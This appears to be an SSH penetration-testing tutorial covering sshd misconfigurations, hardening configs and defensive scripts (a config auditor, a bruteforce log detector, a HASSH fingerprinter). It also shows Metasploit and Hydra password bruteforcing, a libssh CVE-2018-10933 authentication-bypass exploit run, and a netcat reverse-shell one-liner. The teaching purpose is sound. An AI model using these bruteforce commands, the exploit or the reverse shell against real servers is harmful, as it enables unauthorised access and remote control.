Pentesting - 1. SSH Pentesting
I. SSH and SFTP
SSH is a secure remote shell protocol used to operate network services securely over an unsecured network. The default SSH port is 22, and it is common to see it open on servers on the Internet and on intranets.
SFTP is the SSH File Transfer Protocol, used to transfer files over an SSH connection. Most SSH implementations also support SFTP.
II. SSH servers/libs
The most famous and common SSH server and client is OpenSSH (OpenBSD Secure Shell). It is a strong, well-maintained implementation first released in 1999, so it is the one you will see most often on BSD, Linux and even Windows, where it has shipped as an optional feature since Windows 10.
But OpenSSH is not the only implementation; here are other ones:
SSH servers:
- OpenSSH - OpenBSD Secure Shell, shipped in BSD, Linux distributions and Windows since Windows 10
- Dropbear - SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
- PuTTY - SSH implementation for Windows; the client is commonly used, a PuTTY-based server is rarely seen
- CopSSH - implementation of OpenSSH for Windows
SSH libraries (implementing server-side):
- libssh - multiplatform C library implementing the SSHv2 protocol, with bindings in Python, Perl and R; it is used by KDE for SFTP and by GitHub for its git SSH infrastructure
- wolfSSH - SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
- Apache MINA SSHD - Java SSH library built on Apache MINA
- paramiko - Python SSHv2 protocol library
III. Common misconfigurations
1. Remote root login allowed
Since OpenSSH 7.0 the default is PermitRootLogin prohibit-password, which still lets root in with a key; setting it to no disables root login entirely, so an attacker first has to guess a valid user name. In /etc/ssh/sshd_config:
PermitRootLogin no
then restart the daemon (a systemctl daemon-reload is only needed when a unit file changes, not for sshd_config):
systemctl restart sshd
2. SFTP users can execute commands
Many administrators assume an SFTP account is harmless as long as it is chrooted and given a placeholder shell (nologin or /bin/false). But the only thing standing between an authenticated SSH user and command execution is sshd's own configuration: right after authentication the client can request an arbitrary command instead of the sftp subsystem, and sshd runs it through the account's login shell. Accounts set up for the classic external sftp-server have to keep a real shell anyway (that subsystem is itself started through the shell; only internal-sftp runs inside sshd without one), so nothing stops the user from asking for id or /bin/bash unless ForceCommand is set:
$ ssh -v noraj@192.168.1.94 id
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
Secure configuration for an SFTP-only user in /etc/ssh/sshd_config (OpenSSH):
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
This configuration allows only SFTP: it disables shell access by forcing the start command and disabling TTY allocation, and it also disables every kind of port forwarding and tunneling. Two caveats: sshd requires every component of the ChrootDirectory path (here the user's home) to be owned by root and not writable by any other user, otherwise the login is refused; and the forced command must be internal-sftp, because the external sftp-server binary cannot run inside a chroot that contains no shell or libraries.
3. Authentication methods
In high-security environments key-based or two-factor authentication is usually enabled, but turning on a stronger method does not turn off the weaker ones. The fix has to be explicit: PasswordAuthentication no, and for two-factor setups AuthenticationMethods publickey,keyboard-interactive so that both factors are required rather than merely offered. With the SSH client's verbose mode an attacker can see which weaker login methods the server still accepts:
$ ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
$ ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
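The three misconfigurations in this section (root login, SFTP accounts without ForceCommand, weak authentication methods left enabled) can all be read off the effective sshd_config for a given user. The following audit script is an added example, not code from the original page or from the OpenSSH project. It models sshd's "first value wins" rule and Match-block overrides for the User, Group and All criteria only (any other criterion is treated as non-matching, an assumption), and both sample configurations are constructed.

```python
import fnmatch
import re

# OpenSSH defaults for the keywords audited here (see sshd_config(5)).
DEFAULTS = {
    "permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
    "forcecommand": "none", "permittty": "yes", "allowtcpforwarding": "yes",
    "permittunnel": "no", "x11forwarding": "no", "chrootdirectory": "none",
}
_KEYWORD = re.compile(r"^(\S+?)\s*(?:=|\s)\s*(.*)$")   # "Key value" or "Key=value"


def parse_sshd_config(text):
    """Split sshd_config into (global_options, match_blocks). Keywords are
    lower-cased and comments stripped. Within one section the FIRST value for
    a keyword wins, as in sshd(8). match_blocks is [(criteria, options), ...]."""
    global_opts, blocks = {}, []
    current = global_opts
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = _KEYWORD.match(line) if line else None
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":                      # start a new conditional block
            toks = value.split()
            criteria = {k.lower(): v.split(",") for k, v in zip(toks[0::2], toks[1::2])}
            current = {}
            blocks.append((criteria, current))
        else:
            current.setdefault(key, value)
    return global_opts, blocks


def _block_applies(criteria, user, groups):
    """Only User, Group and All are modelled (assumption): a block using any
    other criterion (Address, Host, LocalPort, ...) is treated as NOT matching."""
    for crit, patterns in criteria.items():
        if crit == "all":
            continue
        subjects = [user] if crit == "user" else list(groups) if crit == "group" else None
        if subjects is None or not any(fnmatch.fnmatchcase(s, p) for s in subjects for p in patterns):
            return False
    return True


def effective_options(text, user, groups=()):
    """Options sshd applies to a session for `user`: defaults, overridden by the
    global section, overridden by the first matching Match block that sets each keyword."""
    global_opts, blocks = parse_sshd_config(text)
    effective, overridden = {**DEFAULTS, **global_opts}, set()
    for criteria, opts in blocks:
        if _block_applies(criteria, user, groups):
            for key, value in opts.items():
                if key not in overridden:
                    effective[key] = value
                    overridden.add(key)
    return effective


def audit(text, user, groups=(), sftp_only=False):
    """Findings for `user`. sftp_only=True means the account is supposed to get
    SFTP and nothing else, i.e. the Match block shown above should apply."""
    o = effective_options(text, user, groups)
    findings = []
    if o["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root can log in remotely with a password")
    if o["passwordauthentication"] != "no":
        findings.append("PasswordAuthentication enabled: password guessing works even with keys or 2FA deployed")
    if sftp_only:
        if o["forcecommand"] != "internal-sftp":
            findings.append(f"ForceCommand is {o['forcecommand']!r}: 'ssh {user}@host id' runs through the login shell")
        if o["permittty"] != "no":
            findings.append("PermitTTY not disabled: an interactive shell is possible once a command runs")
        if o["allowtcpforwarding"] != "no" or o["permittunnel"] != "no":
            findings.append("forwarding/tunneling allowed: the SFTP host can be used as a pivot")
        if o["chrootdirectory"] == "none":
            findings.append("no ChrootDirectory: the whole filesystem is browsable over SFTP")
    return findings


# Constructed sample configurations (not taken from a real host).
WEAK_CONFIG = """
PermitRootLogin yes
PermitRootLogin no            # ignored by sshd: the first value wins
PasswordAuthentication yes
Subsystem sftp /usr/lib/openssh/sftp-server
"""
HARDENED_CONFIG = """
PermitRootLogin no
PasswordAuthentication no
Subsystem sftp internal-sftp
Match Group sftponly
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} config, user noraj (group sftponly, SFTP-only) ==")
        print("\n".join(" - " + f for f in audit(cfg, "noraj", ("sftponly",), True)) or " - no findings")
```

On a real host, feed the script the output of `sshd -T -C user=noraj` rather than the raw file: sshd then resolves defaults and Match blocks for that connection itself, and the flat lower-case keyword list it prints parses with the same function.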
IV. Attack examples
1. Password attacks
Password guessing/bruteforce attack
Metasploit
GitHub: https://github.com/rapid7/metasploit-framework
Download (RPM for EL6): https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-5.0.75%2B20200215112510~1rapid7-1.el6.x86_64.rpm
# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
The online installer needs an unrestricted Internet connection (from China, a way around the Great Firewall); manual installation from the RPM:
# rpm -ivh metasploit-framework-5.0.75+20200215112510~1rapid7-1.el6.x86_64.rpm
warning: metasploit-framework-5.0.75+20200215112510~1rapid7-1.el6.x86_64.rpm: Header V4 RSA/SHA256 Signature, key ID 2007b954: NOKEY
Preparing... ################################# [100%]
Updating / installing...
1:metasploit-framework-5.0.75+20200################################# [100%]
Run msfconsole to get started
[root@Ansible-203 tmp]# msfconsole
[-] * WARNING: No database support: No database YAML file
...
       =[ metasploit v5.0.75-dev-                         ]
+ -- --=[ 1969 exploits - 1087 auxiliary - 338 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
msf5 > search ssh
Matching Modules
================
   #   Name                              Disclosure Date  Rank    Check  Description
   -   ----                              ---------------  ----    -----  -----------
   ...
   18  auxiliary/scanner/ssh/ssh_login                    normal  Yes    SSH Login Check Scanner
   ...
msf5 > use 18
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/password/rockyou.txt
PASS_FILE => /usr/share/wordlists/password/rockyou.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.94
RHOSTS => 192.168.1.94
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 10
THREADS => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/ssh/ssh_login) > set username noraj
username => noraj
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.1.94:22 - Success: 'noraj:noraj' ''
[*] Command shell session 1 opened (192.168.1.83:37291 -> 192.168.1.94:22) at 2020-01-02 21:33:33 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Hydra
GitHub: https://github.com/vanhauser-thc/thc-hydra
# yum install -y openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
# yum install -y gcc gcc-c++
# git clone https://github.com/vanhauser-thc/thc-hydra
# cd thc-hydra
# ./configure --prefix=/opt/hydra
# make
# make install
Now type make install
strip hydra pw-inspector
echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
mkdir -p /opt/hydra/bin
cp -f hydra-wizard.sh hydra pw-inspector /opt/hydra/bin && cd /opt/hydra/bin && chmod 755 hydra-wizard.sh hydra pw-inspector
echo OK > /dev/null && test -x xhydra && cp xhydra /opt/hydra/bin && cd /opt/hydra/bin && chmod 755 xhydra || echo OK > /dev/null
sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/opt/hydra"|" dpl4hydra.sh | sed -e "s|^LOCATION=.*|LOCATION="/etc"|" > /opt/hydra/bin/dpl4hydra.sh
chmod 755 /opt/hydra/bin/dpl4hydra.sh
mkdir -p /opt/hydra/etc
cp -f *.csv /opt/hydra/etc
mkdir -p /opt/hydra/man/man1/
cp -f hydra.1 xhydra.1 pw-inspector.1 /opt/hydra/man/man1/
# ln -s /opt/hydra/bin/hydra /usr/bin/
# hydra -l root -P /usr/share/wordlists/password/rockyou.txt -e s ssh://192.168.11.205
Hydra v9.1-dev (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 02:36:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://192.168.11.205:22/
[22][ssh] host: 192.168.11.205 login: root password:
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 02:37:00
Medusa
GitHub:https://github.com/jmk-foofus/medusa
Ncrack
WebSite:http://ncrack.org
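The defender's side of the password attacks above: Metasploit, Hydra, Medusa and Ncrack all leave one "Failed password" line per guess in the server's authentication log. The detector below is an added example (not from the page or from any of those tools) run over constructed log lines; the source address and first port reuse the 192.168.1.83:37291 seen in the Metasploit session above, and the 5-failures-in-60-seconds threshold is an assumption to tune per environment. Real logs carry more variants ("Connection closed by authenticating user", "message repeated N times") that this regex deliberately ignores.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd authentication messages as syslog writes them (constructed sample).
SAMPLE_LOG = """\
Feb 17 02:36:58 srv sshd[1201]: Failed password for invalid user admin from 192.168.1.83 port 37291 ssh2
Feb 17 02:36:59 srv sshd[1203]: Failed password for root from 192.168.1.83 port 37292 ssh2
Feb 17 02:36:59 srv sshd[1205]: Failed password for root from 192.168.1.83 port 37293 ssh2
Feb 17 02:37:00 srv sshd[1207]: Failed password for noraj from 192.168.1.83 port 37294 ssh2
Feb 17 02:37:00 srv sshd[1209]: Failed password for noraj from 192.168.1.83 port 37295 ssh2
Feb 17 02:37:01 srv sshd[1211]: Accepted password for noraj from 192.168.1.83 port 37296 ssh2
Feb 17 02:40:10 srv sshd[1300]: Failed password for bob from 10.0.0.5 port 51000 ssh2
Feb 17 02:45:12 srv sshd[1305]: Accepted publickey for bob from 10.0.0.5 port 51001 ssh2
"""

AUTH_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_auth_line(line):
    """Dict with ts (datetime; syslog omits the year, so it stays 1900 and only
    differences matter), result, method, user, ip; None for other lines."""
    m = AUTH_LINE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%b %d %H:%M:%S")
    return event


def detect_bruteforce(lines, threshold=5, window=60):
    """Sliding-window detector: one 'bruteforce' alert per source IP when it
    reaches `threshold` failed logins within `window` seconds, then a
    'success-after-bruteforce' alert for every later accepted login from that
    IP (the guessed credential being used)."""
    failures = defaultdict(deque)   # ip -> deque of (timestamp, user) inside the window
    flagged, alerts = set(), []
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            q = failures[ip]
            q.append((ts, ev["user"]))
            while q and (ts - q[0][0]).total_seconds() > window:
                q.popleft()             # drop failures that fell out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                users = sorted({u for _, u in q})
                alerts.append(("bruteforce", ip, f"{len(q)} failed logins in {window}s, users {users}"))
        elif ip in flagged:
            alerts.append(("success-after-bruteforce", ip, f"{ev['method']} login as {ev['user']} accepted"))
    return alerts


if __name__ == "__main__":
    for kind, ip, detail in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"[{kind}] {ip}: {detail}")
```

Pipe `journalctl -u sshd -o short` or /var/log/auth.log into detect_bruteforce to run it against a live host; bob's single failure followed by a key login is the normal-user noise the window keeps out of the alerts.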
2. Vulnerability exploitation
CVE-2018-10933
CVE-2018-10933 is the reference for a vulnerability in the libssh library that allows unauthorized access by bypassing authentication.
libssh versions 0.6 and above (0.6.0 to 0.7.5 and 0.8.0 to 0.8.3; fixed in 0.7.6 and 0.8.4) have an authentication bypass in the server-side code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message the server expects to initiate authentication, an attacker can successfully authenticate without any credentials (see the libssh security advisory for CVE-2018-10933). Only applications that embed libssh as a server are affected; OpenSSH and libssh's client side are not.
When you find a vulnerable version with nmap you should see something like this:
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
searchsploit (the tool used to locally browse the Exploit-DB) shows the existing exploits available for libssh.
$ searchsploit libssh
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | exploits/linux/remote/46307.py
libSSH - Authentication Bypass | exploits/linux/remote/45638.py
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
So we can use the exploit to execute a command on the target and confirm that it works:
$ python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 id
uid=0(root) gid=0(root) groups=0(root)
Instead of just running a command we can obtain a reverse shell.
First start the listener on the attacking machine (192.168.1.100 in the payload below): sudo ncat -nlp 80.
Then pass an sh reverse shell payload to the exploit as the command:
python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 80 >/tmp/f"
V. Other tools and resources
HASSH is a network fingerprinting standard that identifies specific SSH client and server implementations from the algorithm lists they offer during key-exchange negotiation; the fingerprint is stored, searched and shared as an MD5 hash.
HASSH helps blue teams detect, control and investigate brute-force or credential-stuffing attempts, data exfiltration, network discovery and lateral movement, because an unusual client implementation stands out regardless of the address it connects from.
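To show what HASSH actually hashes, the following added example (not code from the page or from the HASSH project) encodes and decodes an SSH_MSG_KEXINIT payload and derives hassh and hasshServer from it. Per the HASSH specification, hassh is the MD5 of the client's key-exchange, cipher, MAC and compression name-lists (client-to-server direction) joined with ";", and hasshServer is the same over the server's KEXINIT using the server-to-client lists. The algorithm lists in the two sample KEXINITs are constructed, so the resulting hashes are not fingerprints of any real implementation.

```python
import hashlib
import struct

SSH_MSG_KEXINIT = 20
NAME_LISTS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
              "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")


def _ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def build_kexinit(**lists):
    """Encode an SSH_MSG_KEXINIT payload (RFC 4253 section 7.1): message byte,
    16-byte cookie, ten name-lists, first_kex_packet_follows, reserved uint32.
    The cookie is fixed to zeros here so the output is reproducible."""
    payload = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for name in NAME_LISTS:
        payload += _ssh_string(",".join(lists.get(name, ())).encode("ascii"))
    return payload + b"\x00" + struct.pack(">I", 0)


def parse_kexinit(payload: bytes) -> dict:
    """Decode the ten name-lists of a KEXINIT payload into a dict of strings."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not an SSH_MSG_KEXINIT payload")
    offset, lists = 17, {}                      # skip message byte + cookie
    for name in NAME_LISTS:
        (length,) = struct.unpack_from(">I", payload, offset)
        offset += 4
        lists[name] = payload[offset:offset + length].decode("ascii")
        offset += length
    return lists


def unwrap_packet(packet: bytes) -> bytes:
    """Payload of an unencrypted binary packet (RFC 4253 section 6):
    uint32 packet_length, byte padding_length, payload, padding."""
    packet_length, padding_length = struct.unpack_from(">IB", packet, 0)
    return packet[5:5 + packet_length - padding_length - 1]


def wrap_packet(payload: bytes) -> bytes:
    """Inverse of unwrap_packet: at least 4 bytes of padding, total length a
    multiple of 8 (no MAC, as is the case before key exchange completes)."""
    padding = 8 - (5 + len(payload)) % 8
    padding += 8 if padding < 4 else 0
    return struct.pack(">IB", 1 + len(payload) + padding, padding) + payload + b"\x00" * padding


def hassh(payload: bytes, server: bool = False):
    """Return (hassh_string, md5 hex). Client fingerprints use the c2s lists of
    the client's KEXINIT, hasshServer the s2c lists of the server's KEXINIT."""
    k = parse_kexinit(payload)
    d = "s2c" if server else "c2s"
    hassh_str = ";".join((k["kex"], k[f"enc_{d}"], k[f"mac_{d}"], k[f"comp_{d}"]))
    return hassh_str, hashlib.md5(hassh_str.encode("ascii")).hexdigest()


# Constructed KEXINITs with short algorithm lists (not a real OpenSSH proposal).
CLIENT_KEXINIT = build_kexinit(
    kex=("curve25519-sha256", "diffie-hellman-group14-sha256"),
    hostkey=("ssh-ed25519", "rsa-sha2-512"),
    enc_c2s=("chacha20-poly1305@openssh.com", "aes128-ctr"),
    enc_s2c=("chacha20-poly1305@openssh.com", "aes128-ctr"),
    mac_c2s=("hmac-sha2-256-etm@openssh.com",), mac_s2c=("hmac-sha2-256-etm@openssh.com",),
    comp_c2s=("none",), comp_s2c=("none",),
)
SERVER_KEXINIT = build_kexinit(
    kex=("curve25519-sha256",), hostkey=("ssh-ed25519",),
    enc_c2s=("aes128-ctr",), enc_s2c=("aes256-gcm@openssh.com", "aes128-ctr"),
    mac_c2s=("hmac-sha2-256",), mac_s2c=("hmac-sha2-512-etm@openssh.com",),
    comp_c2s=("none",), comp_s2c=("none", "zlib@openssh.com"),
)

if __name__ == "__main__":
    print("hassh       :", *hassh(CLIENT_KEXINIT))
    print("hasshServer :", *hassh(SERVER_KEXINIT, server=True))
```

In a capture, each side's KEXINIT is the first binary packet after the two identification strings and is still unencrypted, so unwrap_packet applied to its bytes yields the payload hassh expects; that is also why the fingerprint survives even when the rest of the session is opaque.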
ssh-audit is an SSH server auditing tool (banner, key exchange, encryption, MAC, compression, compatibility, security, etc.).
It is handy for pentesters to quickly identify the target version and the algorithms the remote server offers, and to give algorithm recommendations to the customer.
Example of use:
$ ssh-audit 192.168.1.94
# general
(gen) banner: SSH-2.0-OpenSSH_7.9
(gen) software: OpenSSH 7.9
(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
(gen) compression: enabled (zlib@openssh.com)
# key exchange algorithms
(kex) curve25519-sha256 -- [warn] unknown algorithm
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
`- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
# host-key algorithms
(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
`- [warn] using weak random number generator could reveal the key
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
`- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
# message authentication code algorithms
(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
`- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
`- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
# algorithm recommendations (for OpenSSH 7.9)
(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
(rec) -hmac-sha2-512 -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) -umac-64@openssh.com -- mac algorithm to remove
(rec) -umac-128@openssh.com -- mac algorithm to remove
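The sshd_config fragment below turns those recommendations into configuration for OpenSSH 7.9. It is added here and is not part of the page or of ssh-audit's output: it keeps only the algorithms the audit did not flag and pins the cipher list, which had no findings, so a future default cannot widen it silently. The "[warn] unknown algorithm" on curve25519-sha256 above is an artefact of this ssh-audit version not knowing the standardised name; it is the same exchange as curve25519-sha256@libssh.org and both are kept.

```conf
# Key exchange: curve25519 (both names are the same exchange) and the 4096- and
# 8192-bit fixed groups; NIST curves, custom-size group exchange and the SHA-1
# group are dropped.
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256
# Host keys: stop loading the ECDSA key and offer only Ed25519 and RSA with SHA-2
# signatures (ssh-rsa, i.e. RSA with SHA-1, is also dropped; see note below).
HostKey /etc/ssh/ssh_host_ed25519_key
HostKey /etc/ssh/ssh_host_rsa_key
HostKeyAlgorithms ssh-ed25519,rsa-sha2-512,rsa-sha2-256
# Ciphers: none were flagged; listing them pins the set.
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr
# MACs: encrypt-then-MAC with 128-bit or larger tags only.
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com
```

Validate with `sshd -t`, restart sshd and re-run ssh-audit. Removing ssh-rsa goes one step beyond this ssh-audit version, which did not flag it, and locks out clients older than OpenSSH 7.2 that cannot sign with rsa-sha2-*; keep it in HostKeyAlgorithms only if such clients must still connect.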
VI. Other well-known SSH vulnerabilities
- https://www.exploit-db.com/exploits/18557 ~ Sysax 5.53 SSH ‘Username’ Remote Buffer Overflow
- https://www.exploit-db.com/exploits/45001 ~ OpenSSH < 6.6 SFTP Command Execution
- https://www.exploit-db.com/exploits/45233 ~ OpenSSH 2.3 < 7.7 Username Enumeration
- https://www.exploit-db.com/exploits/46516 ~ OpenSSH SCP Client Write Arbitrary Files